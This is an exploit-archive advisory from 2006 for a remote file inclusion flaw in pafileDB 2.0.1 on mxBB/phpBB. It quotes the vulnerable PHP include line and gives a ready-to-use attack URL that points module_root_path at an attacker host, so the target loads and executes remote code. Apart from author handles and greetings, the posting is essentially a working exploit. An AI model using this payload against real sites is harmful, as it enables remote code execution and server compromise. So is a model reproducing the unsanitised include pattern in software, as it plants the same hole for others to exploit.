[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : pafileDB <= 2.0.1 (mxBB/phpBB) Remote File Inclusion Vulnerability
# Published : 2006-05-09
# Author : Darkfire
# Previous Title : phpRaid <= 3.0.b3 (phpBB/SMF) Remote File Inclusion Vulnerabilities
# Next Title : Claroline e-Learning 1.75 (ldap.inc.php) Remote File Inclusion Exploit
# PafileDB Remote File Inclusion[phpBB]
#
# Contact : irc.gigachat.net #ir4dex & darkfire@f4kelive.zzn.com
# Risk : High
# Class : Remote
# Script : pafileDB
# Version : not specified
---------------------------------------------------------------------
Vulnerable code :
$link_language = 'lang_english';
include( $module_root_path . 'language/' . $link_language . '/lang_pafiledb.' . $phpEx );
---------------------------------------------------------------------
http://www.site.com/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]
by Darkfire and IR4DEX GROUP
Greetz: Smurf_RedHat :: V0lks
# www.Syue.com [2006-05-09]